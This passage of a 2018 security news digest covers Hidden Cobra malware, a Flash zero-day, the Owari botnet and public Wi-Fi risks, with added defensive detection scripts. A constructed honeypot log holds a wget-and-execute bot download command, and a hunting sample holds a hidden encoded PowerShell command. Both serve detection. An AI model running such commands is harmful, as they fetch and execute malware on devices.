Roskomnadzor wanted Telegram to hand over its users' chats and encryption keys to the state security services, arguing that the encrypted messaging app is widely used by terrorists operating inside Russia.
However, Telegram declined to comply with the requirements.
Apple has generally voiced support for encryption and data security in the past, but the company has complied with local demands before.
Last year, Apple removed VPN apps from its App Store in China, making it harder for internet users to bypass the Great Firewall, and moved its Chinese iCloud operations to a local firm linked to the Chinese government.
Also, at the end of last year, Apple pulled Skype, along with several similar apps, from its App Store in China.


FBI issues alert over two new malware linked to Hidden Cobra hackers
7.6.2018 thehackernews Virus

The US-CERT has released a joint technical alert from the DHS and the FBI warning about two newly identified malware families used by the prolific North Korean APT group known as Hidden Cobra.
Hidden Cobra, also known as Lazarus Group and Guardians of Peace, is believed to be backed by the North Korean government and is known for attacks against media, aerospace, financial and critical infrastructure organizations worldwide.
The group has been associated with the WannaCry ransomware outbreak that shut down hospitals and businesses worldwide last year. It is also reportedly linked to the 2014 Sony Pictures hack and the 2016 attacks on the SWIFT banking network.
Now, the Department of Homeland Security (DHS) and the FBI have detailed two pieces of malware that Hidden Cobra has been using since at least 2009 to target companies in the media, aerospace, financial and critical infrastructure sectors worldwide.
The two malware families are a Remote Access Trojan (RAT) known as Joanap and a Server Message Block (SMB) worm called Brambul. Let's look at each in turn.
Joanap—A Remote Access Trojan
According to the US-CERT alert, Joanap is a "fully functional RAT": a two-stage malware that establishes peer-to-peer communications and manages botnets built to enable other malicious operations.
The malware typically lands on a system as a file delivered by other malware, which users unknowingly download either when they visit websites compromised by the Hidden Cobra actors or when they open malicious email attachments.
Joanap receives commands from a remote command-and-control server operated by the Hidden Cobra actors, giving them the ability to steal data, install and run more malware, and set up proxy communications on a compromised Windows device.
Other functionalities of Joanap include file management, process management, creation and deletion of directories, botnet management, and node management.
During analysis of the Joanap infrastructure, the U.S. government found the malware on 87 compromised network nodes in 17 countries, including Brazil, China, Spain, Taiwan, Sweden, India and Iran.
Brambul—An SMB Worm
Brambul is a brute-force authentication worm that, like the WannaCry ransomware, spreads over the Server Message Block (SMB) protocol; unlike WannaCry, which exploited an SMB vulnerability, Brambul simply guesses passwords.
The malicious 32-bit Windows SMB worm runs as a service dynamic link library (DLL) or a portable executable file, usually dropped and installed onto victims' networks by dropper malware.
"When executed, the malware attempts to establish contact with victim systems and IP addresses on victims' local subnets," the alert notes.
"If successful, the application attempts to gain unauthorized access via the SMB protocol (ports 139 and 445) by launching brute-force password attacks using a list of embedded passwords. Additionally, the malware generates random IP addresses for further attacks."
Once Brambul gains unauthorized access to a system, it sends information about the victim to the Hidden Cobra operators by email. That information includes the IP address and hostname as well as the username and password of each victim system.
The attackers can then use the stolen credentials to remotely access the compromised system over SMB. The actors can also generate and execute what analysts call a "suicide script."
DHS and the FBI have also provided downloadable lists of the IP addresses with which the Hidden Cobra malware communicates and other indicators of compromise (IOCs), so that defenders can block them and tune network defenses to reduce exposure to malicious cyber activity by the North Korean government.
DHS also recommends that users and administrators follow standard best practices as preventive measures, such as keeping software and systems up to date, running antivirus software, disabling SMB where it is not needed, and blocking unknown executables and applications.
Last year, DHS and the FBI published an alert describing another Hidden Cobra tool, Delta Charlie, a DDoS tool that they believe North Korea uses to launch distributed denial-of-service attacks against its targets.
Other malware previously linked to Hidden Cobra includes Destover, Wild Positron (also known as Duuzer) and Hangman, with capabilities ranging from DDoS botnets and keyloggers to remote access tools (RATs) and wiper malware.
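Brambul's spreading pattern (a burst of failed network logons against several hosts on the local subnet, followed by a success once a password from the embedded list works) is visible in Windows Security event logs as event 4625 failures with logon type 3 followed by a 4624 from the same source. The script below is an added example, not part of the alert or of any vendor tool: it runs that detection over a constructed set of JSON-lines events (the field names and the alerting thresholds are assumptions chosen for the example, not a standard schema).

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Windows Security events in a JSON-lines shape (not real Brambul telemetry).
# 4625 = failed logon, 4624 = successful logon; LogonType 3 = network logon (SMB falls here).
SAMPLE_EVENTS = """
{"time":"2018-06-06T10:00:01","id":4625,"src":"10.0.0.23","host":"FS01","user":"administrator","logon_type":3}
{"time":"2018-06-06T10:00:02","id":4625,"src":"10.0.0.23","host":"FS01","user":"administrator","logon_type":3}
{"time":"2018-06-06T10:00:03","id":4625,"src":"10.0.0.23","host":"FS02","user":"admin","logon_type":3}
{"time":"2018-06-06T10:00:04","id":4625,"src":"10.0.0.23","host":"FS02","user":"administrator","logon_type":3}
{"time":"2018-06-06T10:00:05","id":4625,"src":"10.0.0.23","host":"WS07","user":"administrator","logon_type":3}
{"time":"2018-06-06T10:00:06","id":4625,"src":"10.0.0.23","host":"WS07","user":"guest","logon_type":3}
{"time":"2018-06-06T10:00:07","id":4624,"src":"10.0.0.23","host":"WS07","user":"administrator","logon_type":3}
{"time":"2018-06-06T10:05:00","id":4625,"src":"10.0.0.50","host":"FS01","user":"jdoe","logon_type":3}
{"time":"2018-06-06T11:00:00","id":4625,"src":"10.0.0.50","host":"FS01","user":"jdoe","logon_type":3}
{"time":"2018-06-06T10:00:08","id":4625,"src":"10.0.0.60","host":"FS01","user":"bob","logon_type":2}
"""


def parse_events(text):
    """Parse JSON lines into dicts with a real datetime, oldest first."""
    events = []
    for line in text.strip().splitlines():
        e = json.loads(line)
        e["time"] = datetime.fromisoformat(e["time"])
        events.append(e)
    return sorted(events, key=lambda e: e["time"])


def detect_smb_bruteforce(events, window=timedelta(minutes=2), min_failures=5, min_hosts=2):
    """Flag sources with many network-logon failures across several hosts in a short window.

    The multi-host requirement is what separates worm-style spraying (Brambul walks the
    local subnet) from a single user mistyping a password. Thresholds are assumptions.
    """
    by_src = defaultdict(list)
    for e in events:
        if e.get("logon_type") == 3 and e["id"] in (4624, 4625):
            by_src[e["src"]].append(e)

    alerts = []
    for src, evs in by_src.items():
        fails = [e for e in evs if e["id"] == 4625]
        # Sliding window anchored on each failure in turn
        for i, first in enumerate(fails):
            in_win = [e for e in fails[i:] if e["time"] - first["time"] <= window]
            hosts = {e["host"] for e in in_win}
            if len(in_win) >= min_failures and len(hosts) >= min_hosts:
                end = in_win[-1]["time"]
                # A success shortly after the burst means a password from the list worked
                success = [e for e in evs
                           if e["id"] == 4624 and first["time"] <= e["time"] <= end + window]
                alerts.append({
                    "src": src,
                    "failures": len(in_win),
                    "hosts": sorted(hosts),
                    "users": sorted({e["user"] for e in in_win}),
                    "followed_by_success": bool(success),
                    "success_on": sorted({(e["host"], e["user"]) for e in success}),
                })
                break  # one alert per source is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in detect_smb_bruteforce(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

On the constructed input, only 10.0.0.23 trips the rule: six failures against three hosts in six seconds, then a successful network logon as administrator on WS07, which is exactly the host and account an analyst would isolate and reset first. The other two sources are filtered out by the count threshold and by the logon-type check respectively.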


Adobe fixed the CVE-2018-5002 Flash Zero-Day exploited in targeted attacks in the Middle East

7.6.2018 securityaffairs Exploit

Adobe has fixed several vulnerabilities, including the CVE-2018-5002 Flash zero-day exploited in targeted attacks in the Middle East.
Adobe has released security updates for Flash Player that address four vulnerabilities, including a critical issue (CVE-2018-5002) that has been exploited in targeted attacks mainly aimed at entities in the Middle East.

The CVE-2018-5002 vulnerability, reported by researchers at ICEBRG, Qihoo 360 and Tencent, is a stack-based buffer overflow that attackers can exploit for arbitrary code execution.

“Adobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS. These updates address critical vulnerabilities in Adobe Flash Player 29.0.0.171 and earlier versions. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the security advisory published by Adobe.

“Adobe is aware of a report that an exploit for CVE-2018-5002 exists in the wild, and is being used in limited, targeted attacks against Windows users. These attacks leverage Office documents with embedded malicious Flash Player content distributed via email.”

The researchers did not disclose technical details of the vulnerability, but Adobe confirmed that the zero-day was exploited in targeted attacks against Windows users.

Attackers launched spear-phishing attacks using weaponized Office documents (an Excel spreadsheet named "salary.xlsx") that contain specially crafted Flash content.
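A spreadsheet that carries Flash content does so through an embedded Shockwave Flash ActiveX control, which in an OOXML file lives as an `activeX*.xml` part under `xl/activeX/` (or `word/activeX/` for .docx) and is identified by the Flash Player control's CLSID, `D27CDB6E-AE6D-11CF-96B8-444553540000`; an `ocxPr` property named `Movie` pointing at an http URL is the "load the exploit from a remote server" pattern Qihoo 360 describes. The scanner below is an added example, not code from Adobe, Qihoo 360 or any product: it builds a constructed .xlsx in memory (the ActiveX part is a minimal approximation of the real persistence format and is an assumption, not a copy of the real lure) and flags Flash controls, remote `Movie` URLs and embedded .swf blobs.

```python
import io
import re
import zipfile

# CLSID of the Shockwave Flash Object ActiveX control (documented Flash Player CLSID)
FLASH_CLSID = "D27CDB6E-AE6D-11CF-96B8-444553540000"

# Constructed sample parts; the activeX XML is a minimal stand-in for the real persisted
# control, not the contents of the actual "salary.xlsx" lure (an assumption for the example).
_CLEAN_SHEET = b"<worksheet/>"
_FLASH_ACTIVEX = (
    b'<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" '
    b'ax:classid="{D27CDB6E-AE6D-11cf-96B8-444553540000}" ax:persistence="persistPropertyBag">'
    b'<ax:ocxPr ax:name="Movie" ax:value="http://example.invalid/loader.swf"/>'
    b"</ax:ocx>"
)


def build_sample_xlsx(with_flash):
    """Assemble a tiny OOXML zip in memory, optionally with a Flash ActiveX part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", b"<Types/>")
        z.writestr("xl/worksheets/sheet1.xml", _CLEAN_SHEET)
        if with_flash:
            z.writestr("xl/activeX/activeX1.xml", _FLASH_ACTIVEX)
    return buf.getvalue()


def scan_ooxml(data):
    """Return a finding per part that carries Flash content, with the Movie source if any."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            # Only ActiveX and embedding parts can carry a Flash object
            if not re.search(r"/(activeX|embeddings)/", name):
                continue
            blob = z.read(name)
            text = blob.decode("utf-8", errors="ignore")
            if FLASH_CLSID.lower() in text.lower():
                movie = re.search(r'name="Movie"\s+[^>]*value="([^"]+)"', text)
                src = movie.group(1) if movie else None
                findings.append({
                    "part": name,
                    "reason": "Flash ActiveX control",
                    "movie": src,
                    # Remote source: the SWF (and exploit) is fetched at open time
                    "remote": bool(src and re.match(r"https?://", src, re.I)),
                })
            elif name.lower().endswith(".swf") or blob[:3] in (b"FWS", b"CWS", b"ZWS"):
                # Uncompressed, zlib and LZMA SWF magic values
                findings.append({"part": name, "reason": "embedded SWF",
                                 "movie": None, "remote": False})
    return findings


if __name__ == "__main__":
    for f in scan_ooxml(build_sample_xlsx(True)):
        print(f)
```

A mail gateway or triage script can apply `scan_ooxml` to every Office attachment; a document that contains a Flash control at all is unusual in 2018, and one whose `Movie` property points to a remote http server is the shape of this campaign's lure and should be quarantined rather than delivered.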

“The hackers carefully constructed an Office document that remotely loaded Flash vulnerability. When the document was opened, all the exploit code and malicious payload were delivered through remote servers. This attack mainly targets the Middle East.” reads the analysis published by Qihoo 360.

CVE-2018-5002 zero-day Adobe Flash player

Flash Player 30.0.0.113 also addresses the following vulnerabilities:

CVE-2018-4945 – a critical type confusion vulnerability that can lead to code execution, reported by researchers at Tencent.
CVE-2018-5000 – an “important” severity integer overflow that can lead to information disclosure, it was reported anonymously through Trend Micro’s Zero Day Initiative (ZDI).
CVE-2018-5001 – an “important” out-of-bounds read flaw that can lead to information disclosure, it was reported anonymously through Trend Micro’s Zero Day Initiative (ZDI).
This is the second Flash zero-day discovered in 2018; the first, tracked as CVE-2018-4878, was patched in February after it was exploited by North Korea-linked nation-state hackers in attacks aimed at South Korea. That flaw was later picked up by cybercrime gangs.

According to the analysis published by Qihoo 360, the attackers had been preparing the recently detected campaign since at least February. The C&C domain poses as a job search website in the Middle East, and its name led the experts to believe that the target is located in Doha, Qatar.

“Through analysis, we can see that the attack used a 0-day vulnerability regardless of the cost. The attacker developed sophisticated plans in the cloud and spent at least three months preparing for the attack. The detailed phishing attack content was also tailored to the attack target. All clues show this is a typical APT attack. We suggest all relevant organizations and users to update their Flash to the latest versions in a timely manner. ” concludes Qihoo 360.


It’s not a joke, Owari botnet operators used root as username and password to access a C&C
7.6.2018 securityaffairs BotNet

Security expert Ankit Anubhav discovered a command-and-control server for the Owari botnet protected with weak credentials.
The backend database of an IoT botnet was exposed to researchers after its operators secured their command-and-control server with a trivial username and password combination.

Ankit Anubhav of Newsky Security found an IoT botnet whose backend was poorly configured: the botmaster used weak credentials for authentication to the MySQL database behind the command-and-control server.

The researcher used that weak configuration to access the MySQL server used to control the Owari botnet; its operator had left port 3306 open to the internet and allowed authentication with "root" as both username and password.

“We observed few IPs attacking our honeypots with default credentials, with executing commands like /bin/busybox OWARI post successful login. In one of the cases, a payload hosted on 80(.)211(.)232(.)43 was attempted to be run post download.

When we investigated the IP, we observed that port 3306, the default port for MySQL database, was open.” reads the blog post published by Ankit Anubhav.

“We tried to investigate more into this IP. To our surprise, it is connected to the attacker’s servers using one of the weakest credentials known to mankind.

Username: root
Password: root“

The situation is paradoxical, considering that Mirai-based botnets, including Owari, spread by brute-force guessing passwords on Internet-of-Things devices and abusing default credentials.

Investigation of the database allowed the expert to find a User table containing login credentials for the various users who control the botnet. Some entries could be associated with botmasters, others with customers of the botnet.
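The honeypot observation quoted above (a default-credential login, then `/bin/busybox OWARI`, then a download attempt from the attacker's own IP) is the standard Mirai-family pattern: the bot echoes a bogus busybox applet name to fingerprint the shell, and that name doubles as the variant tag. The script below is an added example, not Newsky's code: it parses a constructed honeypot session log (the line format is an assumption made for the example, and the addresses are documentation ranges) into sessions, pulls out the variant tag, the credentials that worked and the payload hosts, so that the payload host can be handed to the next step, which in Anubhav's case was noticing its open port 3306.

```python
import re
from collections import defaultdict

# Constructed telnet-honeypot log (not Newsky's data). Assumed line format:
# "<ts> session=<id> src=<ip> event=<login|cmd> <payload>"
SAMPLE_LOG = r"""
2018-06-05T10:12:01Z session=s1 src=203.0.113.5 event=login user=admin pass=admin result=success
2018-06-05T10:12:02Z session=s1 src=203.0.113.5 event=cmd enable
2018-06-05T10:12:02Z session=s1 src=203.0.113.5 event=cmd /bin/busybox OWARI
2018-06-05T10:12:03Z session=s1 src=203.0.113.5 event=cmd cd /tmp; wget http://203.0.113.5/bins/owari.arm7 -O .x; chmod +x .x; ./.x; /bin/busybox OWARI
2018-06-05T10:20:11Z session=s2 src=198.51.100.9 event=login user=root pass=xc3511 result=success
2018-06-05T10:20:12Z session=s2 src=198.51.100.9 event=cmd /bin/busybox MIRAI
2018-06-05T10:30:00Z session=s3 src=198.51.100.77 event=login user=root pass=password result=failed
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) session=(?P<sid>\S+) src=(?P<src>\S+) event=(?P<ev>\S+) (?P<rest>.*)$")
LOGIN_RE = re.compile(r"user=(?P<user>\S*) pass=(?P<pw>\S*) result=(?P<res>\S+)")
# Mirai-family bots run "/bin/busybox <TAG>"; the bogus applet name identifies the variant
BUSYBOX_TAG_RE = re.compile(r"/bin/busybox ([A-Z0-9_]{3,})")
URL_RE = re.compile(r"(?:https?|tftp)://[^\s;'\"]+")


def summarize_sessions(text):
    """Group log lines by session and collect credentials, variant tags and download URLs."""
    sessions = defaultdict(lambda: {"src": None, "creds": None, "tags": set(), "urls": set()})
    for line in text.strip().splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not follow the assumed format
        s = sessions[m["sid"]]
        s["src"] = m["src"]
        if m["ev"] == "login":
            lm = LOGIN_RE.search(m["rest"])
            if lm and lm["res"] == "success":
                s["creds"] = (lm["user"], lm["pw"])
        elif m["ev"] == "cmd":
            s["tags"].update(BUSYBOX_TAG_RE.findall(m["rest"]))
            s["urls"].update(URL_RE.findall(m["rest"]))
    return dict(sessions)


def botnet_hits(sessions, tag="OWARI"):
    """Sessions that announced the given variant tag, with the hosts worth investigating next."""
    hits = []
    for sid, s in sessions.items():
        if tag in s["tags"]:
            # The payload host is often attacker-controlled infrastructure (as in the Owari case)
            hosts = {re.sub(r"^\w+://", "", u).split("/")[0] for u in s["urls"]}
            hits.append({"session": sid, "src": s["src"], "creds": s["creds"],
                         "payload_hosts": sorted(hosts), "urls": sorted(s["urls"])})
    return hits


if __name__ == "__main__":
    for hit in botnet_hits(summarize_sessions(SAMPLE_LOG)):
        print(hit)
```

The output for the constructed log is one Owari session: source 203.0.113.5, credentials admin/admin, payload host 203.0.113.5. Changing the `tag` argument selects other variants (the MIRAI session here), and the `payload_hosts` list is the input to whatever infrastructure check follows; in the case described above that check was simply looking at which ports the host exposed.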

“User table contains login credentials for various users who will control the botnet. Some of them can be botnet creators, or some can simply be the customers of the botnet, a.k.a black box users, who pay a sum of money to launch DDoS attacks. Besides credentials, duration limit such as for how much time the user can perform the DDoS, maximum available bots for attack (-1 means the entire botnet army of the bot master is available) and cooldown time (time interval between the two attack commands) can also be observed.” continues the expert.

“In the specific Owari case, we observe one user with duration limit of 3600 seconds with permissible bot usage set as -1(maximum). It is to be noted that the credentials of all these botnet users are also weak.”

The expert also found a history table with information on the DDoS attacks carried out against various targets. Some of the IP addresses targeted by the botnet were associated with rival IoT botnets.

Anubhav also investigated the revenue model behind the Owari botnet; he was able to reach a known Owari operator who uses the handle "Scarface" and who provided the following comment:

“For 60$ / month, I usually offer around 600 seconds of boot time, which is low compared to what other people offer. However, it is the only way I can guarantee a stable bot count.” explained Scarface.

“I can’t allow having 10+ people doing concurrent attacks of 1800 seconds each. Usually there is no cooldown on my spots. If I decide to give the cooldown, it’s about 60 seconds or less. 60$/month is not much but when you get 10–15 customers per month it is enough to cover most of my virtual expenses”

Is this the end for the Owari botnet?

Of course not. Even though the expert gained access to the MySQL database, botnet operators continuously change their attack IPs to stay under the radar, even when malicious traffic from some of their IPs is detected.

The IPs reported in the expert's analysis are already offline.


Are Wi-Fi hotspots in World Cup Russia host cities secure?

7.6.2018 securityaffairs CyberCrime

Experts at Kaspersky Lab have evaluated the security of 32,000 public Wi-Fi hotspots in the 11 Russian cities hosting the World Cup.
The upcoming soccer World Cup is a prime target for crooks, hackers and nation-state actors. Organizers must take care of every aspect of the event to protect participants, including travelers using Wi-Fi networks in the host cities.

Experts at Kaspersky Lab have evaluated the security of 32,000 public Wi-Fi hotspots in the 11 Russian cities hosting the World Cup. We have explained the risks of open Wi-Fi networks several times: threat actors can sniff traffic to steal sensitive data and mount MITM attacks against victims to carry out a broad range of malicious activities.

“A lack of essential traffic encryption for Wi-Fi networks where official and global activities are taking place – such as at locations around the forthcoming FIFA World Cup 2018 – offers especially fertile ground for criminals.” reads the report published by Kaspersky.

“Over a fifth (22.4%) of Wi-Fi hotspots in FIFA World Cup 2018 host cities use unreliable networks. This means that criminals simply need to be located near an access point to grab the traffic and get their hands on user data.”

The study relied on volunteers who agreed to travel around the host cities looking for public Wi-Fi hotspots. The experts found that around 62.4 percent of hotspots are secured with WPA2 encryption, while another 13.5 percent use some other, unidentified encryption method.

Of course, the actual level of protection of a secured network depends on its settings, such as the strength of the password used to access the hotspot.

Wi-Fi Russia World Cup

The share of secured networks varies from city to city across the 11 host cities the researchers evaluated.

Saransk was the most secure city, with 72 percent of access points using WPA/WPA2; Samara and Nizhny Novgorod followed with 67 and 66 percent respectively.

St. Petersburg was the least secure host city, with just 50 percent of hotspots using WPA2 and 37 percent of access points completely unsecured.

It is important to stress that even WPA2 protection should not be considered totally secure.

“Even a WPA2 connection in a cafe couldn’t be considered as secure, if the password is visible to everyone. Nevertheless, we believe that the methodology used represents the Wi-Fi hotspot security situation in the host cities, with a fair degree of accuracy.” states Kaspersky Lab.

“The results of this research show that the security of Wi-Fi connections in FIFA World Cup host cities varies. We therefore recommend that users follow some key safety rules.”

Kaspersky also provided best practices, such as using a trusted VPN while traveling; the complete list follows:

Whenever possible, connect via a Virtual Private Network (VPN). With a VPN, encrypted traffic is transmitted over a protected tunnel, meaning that criminals won’t be able to read your data, even if they gain access to it. For example, the Kaspersky Secure Connection VPN solution can switch on automatically when a connection is not safe.
Do not trust networks that are not password-protected, or have easy-to-guess or easy-to-find passwords.
Even if a network requests a strong password, you should remain vigilant. Fraudsters can find out the network password at a coffee shop, for example, and then create a fake connection using the same password. This allows them to easily steal personal user data. You should only trust network names and passwords given to you by the employees of an establishment.
To maximize your protection, turn off your Wi-Fi connection whenever you are not using it. This will also save your battery life. We recommend you also disable automatic connections to existing Wi-Fi networks.
If you are not 100% sure that the wireless network you are using is secure, but you still need to connect to the Internet, try to limit yourself to basic user actions such as searching for information. You should refrain from entering your login details for social networks or mail services, and definitely do not perform any online banking operations or enter your bank card details anywhere. This will avoid situations where your sensitive data or passwords are intercepted and then used for malicious purposes later on.
To avoid becoming a cybercriminal target, you should enable the “Always use a secure connection” (HTTPS) option in your device settings. Enabling this option is recommended when visiting any websites you think may lack the necessary protection.
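The classification Kaspersky applied (open, legacy encryption, WPA2) and the warning about a fake network that reuses a real SSID can both be automated on a laptop before connecting. The script below is an added example, not Kaspersky's methodology or tooling: it parses a constructed scan in the terse output format of `nmcli -t -f SSID,BSSID,SECURITY,SIGNAL dev wifi list` (colon-separated fields, with the colons inside the BSSID escaped as `\:`; that format is my assumption about nmcli, and the BSSIDs are made up), classifies each access point, and flags SSIDs advertised at more than one security level, which is the evil-twin pattern described in the third recommendation. Unlike Kaspersky's figures, which counted WPA and WPA2 together, the example treats WPA1-only and WEP as weak.

```python
import re
from collections import Counter, defaultdict

# Constructed nmcli-style scan output (not Kaspersky's data). Assumed format of
# `nmcli -t -f SSID,BSSID,SECURITY,SIGNAL dev wifi list`: colon-separated fields,
# with the colons inside the BSSID escaped as "\:".
SAMPLE_SCAN = r"""
CafeFree:AA\:BB\:CC\:DD\:EE\:01::70
CafeFree:AA\:BB\:CC\:DD\:EE\:02:WPA2:55
HotelNet:11\:22\:33\:44\:55\:66:WPA2:80
OldNet:DE\:AD\:BE\:EF\:00\:01:WEP:40
Stadium-Guest:00\:11\:22\:33\:44\:55:WPA1 WPA2:60
AirportWiFi:66\:55\:44\:33\:22\:11:WPA2 802.1X:35
"""

FIELD_RE = re.compile(r"(?<!\\):")  # split on colons that are not backslash-escaped


def parse_scan(text):
    """Turn terse nmcli lines into dicts; the security field becomes a list of flags."""
    rows = []
    for line in text.strip().splitlines():
        ssid, bssid, security, signal = FIELD_RE.split(line, maxsplit=3)
        rows.append({
            "ssid": ssid,
            "bssid": bssid.replace(r"\:", ":"),
            "security": security.split(),
            "signal": int(signal),
        })
    return rows


def classify(security):
    """open: no encryption; weak: WEP or WPA1-only; ok: WPA2/WPA3 (PSK or 802.1X)."""
    if not security:
        return "open"
    if any(s in ("WPA2", "WPA3") for s in security):
        return "ok"
    return "weak"  # WEP, or WPA1 without a WPA2 option


def assess(rows):
    """Summarize the scan and flag SSIDs seen at more than one security level."""
    counts = Counter(classify(r["security"]) for r in rows)
    levels_per_ssid = defaultdict(set)
    for r in rows:
        levels_per_ssid[r["ssid"]].add(classify(r["security"]))
    # The same name advertised both open and encrypted is the classic evil-twin setup
    suspicious = sorted(s for s, levels in levels_per_ssid.items() if len(levels) > 1)
    pct_ok = round(100 * counts["ok"] / len(rows), 1) if rows else 0.0
    return {"counts": dict(counts), "pct_ok": pct_ok, "suspicious_ssids": suspicious}


if __name__ == "__main__":
    print(assess(parse_scan(SAMPLE_SCAN)))
```

On the constructed scan, four of six access points are WPA2-class (66.7 percent), one is open, one is WEP, and "CafeFree" is flagged because it is being advertised both open and WPA2-protected; a traveler seeing that should ask staff which one is theirs, exactly as the recommendation above says, rather than taking the strongest signal.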


How Threat Hunters Operate in Modern Security Environments
7.6.2018 securityaffairs Cyber

Cyber security – With millions of new malware samples surfacing on the internet every year, threat hunters need to be ever more ready and at the top of their game to ensure that their organization stays safe from cyber threats.
Cyber security is a universe of its own. It has its own domains and its fair share of challenges, faced every day by security experts. Of late, a new term has surfaced: threat hunter. The role of the threat hunter is becoming more important with each passing day.


In 2017, the number of cyber-attacks across the US was almost 50% higher than the previous year, and this year is no different. According to a recent survey by Crowd Research Partners, "the number of threats in the cyber space have continued to double each year".

While millions of businesses face threats from cyber criminals, the wise ones are busy recruiting, training and equipping their threat hunters with the tools required to fight back.

Naturally, those who are unsure what a threat hunter is supposed to do are looking for ways to acquire the skill. This article gives a basic overview of threat hunters and how they work in modern security environments.

Job Description, Skills and Qualifications of a Threat Hunter
A network threat hunter starts from the assumption that the network has already been breached. The premise is that even though controls such as VPNs (recommended ones are PureVPN, PIA & Ivacy) and other server protections are in place, an attacker sophisticated enough to bypass them may already be inside.

A threat hunter needs a proactive approach when scanning networks and servers for possible breaches or intrusions, and must be creative in recognizing anomalies and slightly abnormal events on a network.

Technically, threat hunters need to be at the top of their game. Only when they understand in depth how a network functions and how data flows through it can they spot problems such as data being leaked or, worse, hijacked by someone else.

Lastly, a network threat hunter needs to know the SOPs prescribed by the organization he works for, along with the common practices of the security industry. Only when he fully understands the baseline the organization is expected to follow will he be able to spot the exceptions and detect threats nobody has seen before.

Understanding Dynamics of Modern Security Environments
The threats facing modern security environments evolve every day. It is only logical that the tools and procedures in use today will soon become obsolete and be replaced by new ones. Consequently, organizations that care about keeping their networks and digital environments secure need to keep adopting new tools and techniques.

This may not guarantee safety, but it plays a crucial role in keeping organizations at least on par with, if not a step ahead of, the growing threats in the online space.

How Threat Hunters Operate in Modern Security Environments
In 2016, G Data Software reported that 6.8 million new malware specimens surfaced on the internet. A year later, the number rose to 7.1 million. The trend makes it clear that the coming years will be no easier on threat hunters; if anything, it underlines the importance of training them and preparing them for the unexpected.

Obviously, not all of the 7.1 million new strains of malware discovered in 2017 are dangerous. However, identifying the few dangerous ones is what determines whether a digital environment is secure, and this is where threat hunters contribute.

A threat hunter identifies threats that automated and AI systems may have missed, focusing on the shortcomings of the organization's security architecture that let threats into the environment.

How to Conduct a Threat Hunt
Outsource or DIY
The first step in conducting an organization-wide threat hunt is to determine whether it can be carried out by the in-house security team. If so, dedicated resources and equipment must be allocated to the threat hunters.

If, for any reason, the in-house team lacks the skills for such a task, or if resource or time constraints keep the security team occupied, the safer option is to outsource it.

Focus on Key Areas and Make a Plan
It is crucial to treat threat hunting as a planned process, not an ad hoc task. A proper plan and defined procedures for the whole hunt go a long way toward making the effort pay off.

With a plan and a schedule in place, the threat hunting team's tasks will not interfere with those of other teams. The schedule also fixes the order in which tasks are executed, so hunters can work smoothly while keeping track of what has been done and what still needs attention.

Produce a Hypothesis
Beginning with the end in mind makes it easy to plot the journey and to know for sure when a task is complete. When hunting, the team should decide what it is looking for and what it wants to find: for example, whether it is hunting for malware or for intruders who may have compromised the system.

Knowing exactly what to look for makes it easy to find it if it is there, or to know when to stop if there is nothing. Without a hypothesis, the search may become endless and the hunters will never be sure when to stop.

Gather Crucial Information and Data
There is a lot of work in organizing the available information and data. Unorganized data is useless, because it becomes almost impossible to find what is needed at the right moment. The data threat hunters collect and organize can include process names, command lines, DNS queries, destination IP addresses, digital signatures and so on.

If the information is available but not sorted in a way that is easy to sift through, hunters may spend a lot of time just locating the right data and more time putting it to use. That inflates the budget and resources consumed by threat hunting and hurts the team's productivity.
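The two steps above, a concrete hypothesis and organized process data, are what a hunt actually runs on. The script below is an added example, not from the article or any product: it takes a constructed set of process-creation events (the kind of fields Sysmon event 1 or an EDR would give you; the records themselves are made up) and tests two hypotheses, "a malicious document got code execution, so an Office process spawned a script host" and "anything an attacker ran is rare across the fleet", then ranks the intersection for the analyst. The process lists are my assumptions for the example.

```python
import json
from collections import defaultdict

# Constructed process-creation events (JSON lines), in the shape of Sysmon event 1 / EDR telemetry.
# Not real data from any organization.
SAMPLE_EVENTS = """
{"host":"WS01","parent":"explorer.exe","image":"outlook.exe","cmdline":"outlook.exe"}
{"host":"WS01","parent":"outlook.exe","image":"excel.exe","cmdline":"excel.exe salary.xlsx"}
{"host":"WS01","parent":"excel.exe","image":"cmd.exe","cmdline":"cmd.exe /c powershell -nop -w hidden -enc SQBFAFgA"}
{"host":"WS01","parent":"cmd.exe","image":"powershell.exe","cmdline":"powershell -nop -w hidden -enc SQBFAFgA"}
{"host":"WS02","parent":"explorer.exe","image":"excel.exe","cmdline":"excel.exe budget.xlsx"}
{"host":"WS02","parent":"services.exe","image":"svchost.exe","cmdline":"svchost.exe -k netsvcs"}
{"host":"WS03","parent":"services.exe","image":"svchost.exe","cmdline":"svchost.exe -k netsvcs"}
{"host":"WS04","parent":"services.exe","image":"svchost.exe","cmdline":"svchost.exe -k netsvcs"}
{"host":"WS03","parent":"explorer.exe","image":"chrome.exe","cmdline":"chrome.exe"}
{"host":"WS04","parent":"explorer.exe","image":"chrome.exe","cmdline":"chrome.exe"}
"""

# Assumed lists for the example: document handlers and the script hosts they should never spawn
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
          "rundll32.exe", "regsvr32.exe"}


def load(text):
    return [json.loads(line) for line in text.strip().splitlines()]


def hunt_office_spawns_shell(events):
    """Hypothesis 1: a malicious document got code execution (Office parent, script-host child)."""
    return [e for e in events
            if e["parent"].lower() in OFFICE and e["image"].lower() in SHELLS]


def hunt_rare_commandlines(events, max_hosts=1):
    """Hypothesis 2 (stacking): benign command lines recur fleet-wide; attacker activity is rare."""
    hosts_per_cmd = defaultdict(set)
    for e in events:
        hosts_per_cmd[e["cmdline"]].add(e["host"])
    return sorted(cmd for cmd, hosts in hosts_per_cmd.items() if len(hosts) <= max_hosts)


def score(events):
    """Events matching a hypothesis AND rare across the fleet go to the top of the queue."""
    rare = set(hunt_rare_commandlines(events))
    return sorted({(e["host"], e["cmdline"]) for e in hunt_office_spawns_shell(events)
                   if e["cmdline"] in rare})


if __name__ == "__main__":
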